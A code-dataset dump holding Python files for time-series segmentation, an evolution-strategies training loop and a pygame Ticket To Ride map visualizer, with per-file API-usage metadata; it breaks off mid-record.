[{"api_name": "cv2.cv2.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 11, "usage_type": "name"}, {"api_name": "cv2.cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 14, "usage_type": "name"}, {"api_name": "cv2.cv2.waitKey", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 15, "usage_type": "name"}, {"api_name": "cv2.cv2.destroyWindow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 16, "usage_type": "name"}, {"api_name": "re.search", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cv2.imwrite", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 30, "usage_type": "call"}, {"api_name": "math.log", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.cv2.normalize", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 40, "usage_type": "name"}, {"api_name": "cv2.cv2.NORM_MINMAX", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.cv2.convertScaleAbs", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 41, "usage_type": "name"}, {"api_name": 
"numpy.hstack", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 50, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.cv2.normalize", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 60, "usage_type": "name"}, {"api_name": "cv2.cv2.NORM_MINMAX", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.cv2.convertScaleAbs", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.cv2.blur", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 68, "usage_type": "name"}, {"api_name": "cv2.cv2.blur", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.cv2.medianBlur", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.cv2.Laplacian", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 80, "usage_type": "name"}, {"api_name": "cv2.cv2.CV_16S", "line_number": 80, "usage_type": "attribute"}, {"api_name": "cv2.cv2.convertScaleAbs", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.cv2.split", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "cv2.cv2.equalizeHist", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 91, "usage_type": "name"}, {"api_name": "cv2.cv2.equalizeHist", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 92, "usage_type": "name"}, {"api_name": "cv2.cv2.equalizeHist", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "re.search", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "cv2.cv2.merge", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 109, "usage_type": "name"}, {"api_name": "cv2.cv2.merge", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 112, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "439398311", "text": "import numpy as np\nfrom itertools import combinations \n\ndef naive(x, k, sigma, criterion='gmse'):\n if criterion == 'gmse':\n return naive_gmse(x, k, sigma)\n elif criterion == 'minmax':\n return naive_minmax(x, k, sigma)\n else:\n print('criterion not match, should be gmse|minmax')\n return None\n\ndef naive_gmse(x, k, sigma):\n pivot_candidate = list(range(2, len(x)-1))\n min_error = 10E10\n best_pivot = list(range(0, k+1))\n\n for c in combinations(pivot_candidate, k):\n pivots = [0] + list(c) + [len(x)]\n case_error = 0\n # if 1 in list(np.array(c[1:]) - np.array(c[:-1])): continue\n \n case_error = sum([sigma[pivots[i], pivots[i+1]-1] for i in range(len(pivots)-1)])\n # print(c, case_error)\n if case_error < min_error:\n min_error = case_error\n best_pivot = c\n return list(best_pivot)\n\n\ndef naive_minmax(x, k, sigma):\n pivot_candidate = list(range(2, len(x)-1))\n min_error = 10E10\n best_pivot = list(range(0, k+1))\n\n for c in combinations(pivot_candidate, k):\n pivots = [0] + list(c) + [len(x)]\n # case_error = 0\n \n case_error = max([sigma[pivots[i], pivots[i+1]-1] for i in range(len(pivots)-1)])\n # print(c, case_error)\n if case_error < min_error:\n min_error = case_error\n best_pivot = c\n return list(best_pivot)\n\n\ndef bottom_up_k(x, k, sigma=None):\n segments = [x[i:i+2] for i in range(0, len(x), 2)]\n cost=[]\n for i in range(len(segments)-1):\n cost.append(regression_error(segments[i] + segments[i+1]))\n if cost == []:\n return segments\n # print('cost:', cost)\n while len(segments) > k+1:\n i = cost.index(min(cost))\n segments[i] = segments[i] + segments[i+1]\n del segments[i+1]\n del cost[i]\n if cost == []:\n break\n if i > 0: cost[i-1] = regression_error(segments[i-1]+segments[i])\n if i < len(segments)-1: cost[i] = regression_error(segments[i]+segments[i+1])\n seg_lens = np.array([len(p) for p in segments])\n pivots = seg_lens.cumsum()\n return pivots.tolist()[:-1]\n\ndef bottom_up(T, max_err):\n segments = [T[i:i+2] for i in range(0, len(T), 2)]\n cost = []\n for i in range(len(segments)-1):\n cost.append(regression_error(segments[i] + segments[i+1]))\n # print(cost)\n if cost == []:\n return segments\n while min(cost) < max_err:\n i = cost.index(min(cost))\n segments[i] = segments[i] + segments[i+1]\n del segments[i+1]\n del cost[i]\n if cost == []:\n break\n if i > 0: cost[i-1] = regression_error(segments[i-1]+segments[i])\n if i < len(segments)-1: cost[i] = regression_error(segments[i]+segments[i+1])\n return segments\n\ndef bottom_up_iter(x):\n segments = [x[i:i+2] for i in range(0, len(x), 2)]\n cost=[]\n for i in 
range(len(segments)-1):\n cost.append(regression_error(segments[i] + segments[i+1]))\n if cost == []:\n return segments\n\n while len(segments) > 1:\n i = cost.index(min(cost))\n segments[i] = segments[i] + segments[i+1]\n del segments[i+1]\n del cost[i]\n if cost == []:\n break\n if i > 0: cost[i-1] = regression_error(segments[i-1]+segments[i])\n if i < len(segments)-1: cost[i] = regression_error(segments[i]+segments[i+1])\n seg_lens = np.array([len(p) for p in segments])\n pivots = seg_lens.cumsum()[:-1].tolist()\n error = max_error(x, pivots)\n yield error, pivots\n \n # return pivots.tolist()[:-1]\n\ndef top_down(T, max_err):\n # if len(T) < 4:\n # return [T]\n if regression_error(T) > max_err:\n best_so_far = float('inf')\n for i in range(1, len(T)-1):\n err = large_mse(T[:i], T[i:])\n if err < best_so_far:\n break_point = i\n best_so_far = err\n if 'i' not in locals():\n return [T]\n # return [T[:break_point], T[break_point:]]\n segments = []\n segments.extend(top_down(T[:break_point], max_err))\n segments.extend(top_down(T[break_point:], max_err))\n return segments\n else:\n return [T]\n\ndef top_down_k(T, k, max_err=0):\n def filter_seg(segs):\n pass\n def get_best_pivot(t, begin_point):\n best_error = float('inf')\n best_pivot = 1\n for i in range(1, len(t)-1):\n err = large_mse(t[:i], t[i:])\n if err < best_error:\n best_pivot = i\n best_error = err\n return best_pivot + begin_point\n def seg_by_layer(segs, pvts):\n begins = [0] + pvts\n \n pvts = []\n visited_k = []\n if regression_error(T) < max_err: return []\n\n return pvts\n\ndef create_tdtree(T, max_err, begin_point=0, depth=0):\n '''\n create_tdtree(T, max_err, begin_point=0, depth=0)\n create top down tree with dictionary-based tree structure\n '''\n if regression_error(T) > max_err:\n pivots = {}\n best_so_far = float('inf')\n for i in range(1, len(T)-1):\n err = large_mse(T[:i], T[i:])\n if err < best_so_far:\n break_point = i\n best_so_far = err\n if 'i' not in locals():\n return {}\n left = create_tdtree(T[:break_point], max_err, begin_point, depth=depth+1)\n right = create_tdtree(T[break_point:], max_err, begin_point+break_point, depth=depth+1)\n \n lerr = regression_error(T[:break_point])\n rerr = regression_error(T[break_point:])\n pivots['pvt'] = begin_point+break_point\n pivots['err'] = regression_error(T)\n pivots['lerr'] = lerr\n pivots['rerr'] = rerr\n pivots['depth'] = depth\n if left != {} : pivots['left'] = left\n if right != {}: pivots['right'] = right\n return pivots\n else:\n return {}\n\ndef traverse_by_l2r(node, flatten_nodes):\n # print(node)\n depth = node['depth']\n if len(flatten_nodes) < depth + 1:\n flatten_nodes.append([])\n\n nd = { k: node[k] for k in ['pvt', 'lerr', 'rerr', 'err', 'depth'] }\n flatten_nodes[depth].append(nd)\n if 'left' in node:\n traverse(node['left'], flatten_nodes)\n if 'right' in node:\n traverse(node['right'], flatten_nodes)\n return flatten_nodes\n\n\ndef traverse_by_errs(node, flatten_nodes):\n # print(node)\n depth = node['depth']\n if len(flatten_nodes) < depth + 1:\n flatten_nodes.append([])\n\n nd = { k: node[k] for k in ['pvt', 'lerr', 'rerr', 'err', 'depth'] }\n flatten_nodes[depth].append(nd)\n if 'left' in node:\n traverse(node['left'], flatten_nodes)\n if 'right' in node:\n traverse(node['right'], flatten_nodes)\n return flatten_nodes\n\ntraverse = traverse_by_l2r\ntraverse = traverse_by_errs\n\ndef mse(y, y_bar):\n if len(y) < 2:\n return 0.0\n s = 0.0\n for i in range(len(y)):\n s += (y[i] - y_bar[i])**2\n # err = (s**.5)/len(y)\n err = s/len(y)\n return 
err\n\ndef regression(y):\n if len(y) == 0: return []\n if len(y) == 1: return y\n x = list(range(1,len(y)+1))\n fit = np.polyfit(x, y, 1)\n regr = np.poly1d(fit)\n r = regr(x)\n return r\n\ndef regression_error(T):\n r = regression(T)\n err = mse(T, r)\n return err\n\ndef max_error(t, pivots):\n pivots = [0] + list(pivots) + [len(t)]\n return max([regression_error(t[pivots[i]:pivots[i+1]]) for i in range(len(pivots)-1)])\n\ndef seg_errors(t, pivots):\n pivots = [0] + pivots + [len(t)]\n return[regression_error(t[pivots[i]:pivots[i+1]]) for i in range(len(pivots)-1)]\n\ndef large_mse(seg1, seg2):\n return max(regression_error(seg1), regression_error(seg2))\n", "sub_path": "tsseg/greed.py", "file_name": "greed.py", "file_ext": "py", "file_size_in_byte": 7734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "itertools.combinations", "line_number": 18, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "292896396", "text": "#!/usr/bin/python\r\n\r\n# Libraries to be imported\r\nimport gym\r\nfrom gym import spaces\r\nimport numpy as np\r\nfrom numpy import floor, log, eye, zeros, array, sqrt, sum, dot, tile, outer, real\r\nfrom numpy import exp, diag, power, ravel\r\nfrom numpy.linalg import eig, norm\r\nfrom numpy.random import randn\r\nimport math\r\nimport random\r\nimport time\r\nfrom scipy import zeros, ones\r\nfrom scipy.linalg import expm\r\nimport configparser\r\nimport sys\r\nimport os\r\nfrom six import integer_types\r\nimport struct\r\nimport net\r\nfrom policy import ErPolicy, GymPolicy\r\nfrom evoalgo import EvoAlgo\r\nfrom utils import ascendent_sort\r\n\r\n# Evolve with ES algorithm taken from Salimans et al. 
(2017)\r\nclass Salimans(EvoAlgo):\r\n def __init__(self, env, policy, seed, filedir):\r\n EvoAlgo.__init__(self, env, policy, seed, filedir)\r\n\r\n def run(self, maxsteps):\r\n\r\n start_time = time.time()\r\n\r\n # initialize the solution center\r\n self.center = self.policy.get_trainable_flat()\r\n \r\n # Extract the number of parameters\r\n nparams = self.policy.nparams\r\n # setting parameters\r\n if self.batchSize == 0:\r\n # 4 + floor(3 * log(N))\r\n self.batchSize = int(4 + math.floor(3 * math.log(nparams)))\r\n # Symmetric weights in the range [-0.5,0.5]\r\n weights = zeros(self.batchSize)\r\n\r\n ceval = 0 # current evaluation\r\n cgen = 0 # current generation\r\n # Parameters for Adam policy\r\n m = zeros(nparams)\r\n v = zeros(nparams)\r\n epsilon = 1e-08 # To avoid numerical issues with division by zero...\r\n beta1 = 0.9\r\n beta2 = 0.999\r\n \r\n # RandomState for perturbing the performed actions (used only for samples, not for centroid)\r\n np.random.seed(self.seed)\r\n\r\n print(\"Salimans: seed %d maxmsteps %d batchSize %d stepsize %lf noiseStdDev %lf wdecay %d sameEnvCond %d nparams %d\" % (self.seed, maxsteps / 1000000, self.batchSize, self.stepsize, self.noiseStdDev, self.wdecay, self.sameenvcond, nparams))\r\n\r\n # Set evolution mode\r\n self.policy.runEvo()\r\n\r\n # main loop\r\n elapsed = 0\r\n while ceval < maxsteps:\r\n cgen += 1\r\n\r\n # Extract half samples from Gaussian distribution with mean 0.0 and standard deviation 1.0\r\n samples = np.random.randn(self.batchSize, nparams)\r\n # We generate simmetric variations for the offspring\r\n symmSamples = zeros((self.batchSize * 2, nparams))\r\n for i in range(self.batchSize):\r\n sampleIdx = 2 * i\r\n for g in range(nparams):\r\n symmSamples[sampleIdx,g] = samples[i,g]\r\n symmSamples[sampleIdx + 1,g] = -samples[i,g]\r\n # Generate offspring\r\n offspring = tile(self.center.reshape(1, nparams), (self.batchSize * 2, 1)) + self.noiseStdDev * symmSamples\r\n # Evaluate offspring\r\n fitness = zeros(self.batchSize * 2)\r\n # If normalize=1 we update the normalization vectors\r\n if self.policy.normalize == 1:\r\n self.policy.nn.updateNormalizationVectors()\r\n # Reset environmental seed every generation\r\n self.policy.setSeed(self.policy.get_seed + cgen)\r\n # Set generalization flag to False\r\n self.policy.doGeneralization(False)\r\n # Evaluate offspring\r\n for k in range(self.batchSize * 2):\r\n # Set policy parameters (corresponding to the current offspring)\r\n self.policy.set_trainable_flat(offspring[k])\r\n # Sample of the same generation experience the same environmental conditions\r\n if self.sameenvcond == 1:\r\n self.policy.setSeed(self.policy.get_seed + cgen)\r\n # Evaluate the offspring\r\n eval_rews, eval_length = self.policy.rollout(timestep_limit=1000)\r\n # Get the fitness\r\n fitness[k] = eval_rews\r\n # Update the number of evaluations\r\n ceval += eval_length\r\n # Update data if the current offspring is better than current best\r\n self.updateBest(fitness[k], offspring[k])\r\n\r\n # Sort by fitness and compute weighted mean into center\r\n fitness, index = ascendent_sort(fitness)\r\n # Now me must compute the symmetric weights in the range [-0.5,0.5]\r\n utilities = zeros(self.batchSize * 2)\r\n for i in range(self.batchSize * 2):\r\n utilities[index[i]] = i\r\n utilities /= (self.batchSize * 2 - 1)\r\n utilities -= 0.5\r\n # Now we assign the weights to the samples\r\n for i in range(self.batchSize):\r\n idx = 2 * i\r\n weights[i] = (utilities[idx] - utilities[idx + 1]) # pos - neg\r\n\r\n # 
Compute the gradient\r\n g = 0.0\r\n i = 0\r\n while i < self.batchSize:\r\n gsize = -1\r\n if self.batchSize - i < 500:\r\n gsize = self.batchSize - i\r\n else:\r\n gsize = 500\r\n g += dot(weights[i:i + gsize], samples[i:i + gsize,:]) # weights * samples\r\n i += gsize\r\n # Normalization over the number of samples\r\n g /= (self.batchSize * 2)\r\n # Weight decay\r\n if (self.wdecay == 1):\r\n globalg = -g + 0.005 * self.center\r\n else:\r\n globalg = -g\r\n # ADAM policy\r\n # Compute how much the center moves\r\n a = self.stepsize * sqrt(1.0 - beta2 ** cgen) / (1.0 - beta1 ** cgen)\r\n m = beta1 * m + (1.0 - beta1) * globalg\r\n v = beta2 * v + (1.0 - beta2) * (globalg * globalg)\r\n dCenter = -a * m / (sqrt(v) + epsilon)\r\n # update center\r\n self.center += dCenter\r\n\r\n centroidfit = -999999999.0\r\n if self.evalCenter != 0:\r\n # Evaluate the centroid\r\n self.policy.set_trainable_flat(self.center)\r\n if self.sameenvcond == 1:\r\n self.policy.setSeed(self.policy.get_seed + cgen)\r\n eval_rews, eval_length = self.policy.rollout(timestep_limit=1000)\r\n centroidfit = eval_rews\r\n ceval += eval_length\r\n # Update data if the centroid is better than current best\r\n self.updateBest(centroidfit, self.center)\r\n\r\n # Now perform generalization\r\n if self.policy.generalize:\r\n candidate = None\r\n if centroidfit > fitness[self.batchSize * 2 - 1]:\r\n # Centroid undergoes generalization test\r\n candidate = np.copy(self.center)\r\n else:\r\n # Best sample undergoes generalization test\r\n bestsamid = index[self.batchSize * 2 - 1]\r\n candidate = np.copy(offspring[bestsamid])\r\n # Set the seed\r\n self.policy.set_trainable_flat(candidate) # Parameters must be updated by the algorithm!!\r\n self.policy.setSeed(self.policy.get_seed + 1000000)\r\n self.policy.doGeneralization(True)\r\n eval_rews, eval_length = self.policy.rollout(timestep_limit=1000)\r\n gfit = eval_rews\r\n ceval += eval_length\r\n # Update data if the candidate is better than current best generalizing individual\r\n self.updateBestg(gfit, candidate)\r\n\r\n # Compute the elapsed time (i.e., how much time the generation lasted)\r\n elapsed = (time.time() - start_time)\r\n\r\n # Update information\r\n self.updateInfo(cgen, ceval, fitness, self.center, centroidfit, fitness[self.batchSize * 2 - 1], elapsed, maxsteps)\r\n\r\n # save data\r\n self.save(cgen, ceval, centroidfit, self.center, fitness[self.batchSize * 2 - 1], (time.time() - start_time))\r\n\r\n # print simulation time\r\n end_time = time.time()\r\n print('Simulation time: %dm%ds ' % (divmod(end_time - start_time, 60)))\r\n\r\n", "sub_path": "salimans.py", "file_name": "salimans.py", "file_ext": "py", "file_size_in_byte": 8235, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "evoalgo.EvoAlgo", "line_number": 27, "usage_type": "name"}, {"api_name": "evoalgo.EvoAlgo.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "evoalgo.EvoAlgo", "line_number": 29, "usage_type": "name"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 43, "usage_type": "call"}, {"api_name": "math.log", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 57, "usage_type": "call"}, {"api_name": 
"numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "scipy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 79, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.ascendent_sort", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 166, "usage_type": "call"}, {"api_name": "time.time", "line_number": 178, "usage_type": "call"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "95797763", "text": "import ttr_info as info\r\nimport ttr_classes as ttr\r\nimport pygame\r\n\r\ngame_map = ttr.Map(info.city_map,info.possible_tickets)\r\n\r\n# Define some colors\r\nred = (255,0,0)\r\ngreen = (0,255,0)\r\nblue = (0,0,255)\r\ndarkBlue = (0,0,128)\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\npink = (255,200,200)\r\ncolor_list = [red,green,blue,darkBlue,white,black,pink]\r\nheight = width = 19\r\nmargin = 6\r\nthickness = 1\r\nrect_color = black\r\nnum_pressed = 0\r\nx_scale = 18\r\ny_scale = 18\r\nnum_rows = 28\r\nnum_cols = 54\r\n\r\npygame.init()\r\n\r\n# Set the width and height of the screen [width, height]\r\nsize = (1700,706)\r\nscreen = pygame.display.set_mode(size)\r\n\r\npygame.display.set_caption(\"Ticket To Ride Visualization\")\r\n\r\n# Loop until the user clicks the close button.\r\ndone = False\r\n\r\n# Used to manage how fast the screen updates\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndef get_cities():\r\n cities = set()\r\n for city in game_map.nodes:\r\n cities.add(game_map.nodes[city].pixel)\r\n return cities\r\n\r\ndef get_roads():\r\n roads = []\r\n for city in game_map.city_map:\r\n start_x = width*game_map.nodes[city].pixel[0] + margin*(game_map.nodes[city].pixel[0]+1) + width/2\r\n start_y = height*game_map.nodes[city].pixel[1] + margin*(game_map.nodes[city].pixel[1]+1) + height/2\r\n for dest in game_map.city_map[city]:\r\n end_x = width*game_map.nodes[dest].pixel[0] + margin*(game_map.nodes[dest].pixel[0]+1) + width/2\r\n end_y = height*game_map.nodes[dest].pixel[1] + + margin*(game_map.nodes[dest].pixel[1]+1) + height/2\r\n roads.append([(start_x,start_y),(end_x,end_y)])\r\n return roads\r\n\r\ndef draw_roads(added_lines):\r\n for i in get_roads():\r\n pygame.draw.lines(screen, black, False, i, 3) \r\n\r\n for i in added_lines:\r\n if type(i) == list:\r\n pygame.draw.lines(screen, green, False, i, 3)\r\n\r\ndef better_map():\r\n cities = get_cities()\r\n for col in range(num_cols):\r\n for row in range(num_rows):\r\n pygame.draw.rect(screen,black,(width*col+margin*(col+1),height*row+margin*(row+1),width,height),thickness)\r\n\r\n for city in game_map.nodes:\r\n x = game_map.nodes[city].pixel[0]\r\n y = game_map.nodes[city].pixel[1]\r\n pygame.draw.rect(screen,red,(width*x+margin*(x+1),height*y+margin*(y+1),width,height),0)\r\n fontObj = pygame.font.Font('freesansbold.ttf', height-1)\r\n textSurfaceObj = 
fontObj.render(city, True, white, black)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (width*(x+1)+margin*(x+1),height*y+margin*(y+1))\r\n screen.blit(textSurfaceObj, textRectObj)\r\n\r\ndef check_mouse(pos):\r\n for city in game_map.nodes:\r\n x = game_map.nodes[city].pixel[0]\r\n y = game_map.nodes[city].pixel[1]\r\n if ((pos[0] - (width*x+margin*(x+1)))**2 + (pos[1] - (height*y+margin*(y+1)))**2)**0.5 < 20:\r\n pygame.draw.rect(screen,green,(width*x+margin*(x+1),height*y+margin*(y+1),width,height),0)\r\n fontObj = pygame.font.Font('freesansbold.ttf', height-1)\r\n textSurfaceObj = fontObj.render(city, True, black, white)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (width*(x+1)+margin*(x+1),height*y+margin*(y+1))\r\n screen.blit(textSurfaceObj, textRectObj)\r\n return city\r\n return False\r\n\r\ndef use_road(current_road):\r\n start = current_road[0]\r\n end = current_road[1]\r\n\r\n if end in game_map.nodes[start].adj_list:\r\n game_map.remove_edge((start,end))\r\n start_x = width*game_map.nodes[start].pixel[0] + margin*(game_map.nodes[start].pixel[0]+1) + width/2\r\n start_y = height*game_map.nodes[start].pixel[1] + margin*(game_map.nodes[start].pixel[1]+1) + height/2\r\n end_x = width*game_map.nodes[end].pixel[0] + margin*(game_map.nodes[end].pixel[0]+1) + width/2\r\n end_y = height*game_map.nodes[end].pixel[1] + + margin*(game_map.nodes[end].pixel[1]+1) + height/2\r\n print(current_road)\r\n return [(start_x,start_y),(end_x,end_y)]\r\n\r\n return\r\n\r\n\r\n\r\ncities = get_cities()\r\ncurrent_road = []\r\nadded_lines = []\r\n# -------- Main Program Loop -----------\r\nwhile not done:\r\n screen.fill(white)\r\n# --- Main event loop\r\n for event in pygame.event.get(): # User did something\r\n pos = pygame.mouse.get_pos()\r\n if event.type == pygame.QUIT: # If user clicked close\r\n done = True # Flag that we are done so we exit this loop\r\n\r\n\r\n if event.type == pygame.MOUSEBUTTONUP and check_mouse(pos):\r\n if len(current_road) == 1:\r\n current_road.append(check_mouse(pos))\r\n added_lines.append(use_road(current_road))\r\n current_road = []\r\n elif len(current_road) == 0:\r\n \r\n current_road.append(check_mouse(pos))\r\n\r\n \r\n\r\n \r\n draw_roads(added_lines)\r\n better_map()\r\n check_mouse(pos)\r\n \r\n\r\n\r\n\r\n\r\n fontObj = pygame.font.Font('freesansbold.ttf', 19)\r\n textSurfaceObj = fontObj.render(\"Mouse Pos: \" + str(pos), True, white, black)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (1360,6)\r\n screen.blit(textSurfaceObj, textRectObj)\r\n\r\n fontObj = pygame.font.Font('freesansbold.ttf', 14)\r\n textSurfaceObj = fontObj.render(\"Current Road: \" + str(current_road), True, white, black)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (1360,6+19*1)\r\n screen.blit(textSurfaceObj, textRectObj)\r\n\r\n\r\n # --- Go ahead and update the screen with what we've drawn.\r\n pygame.display.update()\r\n\r\n # --- Limit to 60 frames per second\r\n clock.tick(60)\r\n\r\n# Close the window and quit.\r\n# If you forget this line, the program will 'hang'\r\n# on exit if running from IDLE.\r\npygame.quit()\r\n\r\n", "sub_path": "TTR/viz.py", "file_name": "viz.py", "file_ext": "py", "file_size_in_byte": 5778, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ttr_classes.Map", "line_number": 5, "usage_type": "call"}, {"api_name": "ttr_info.city_map", "line_number": 5, "usage_type": "attribute"}, 
{"api_name": "ttr_info.possible_tickets", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 121, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 121, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 122, 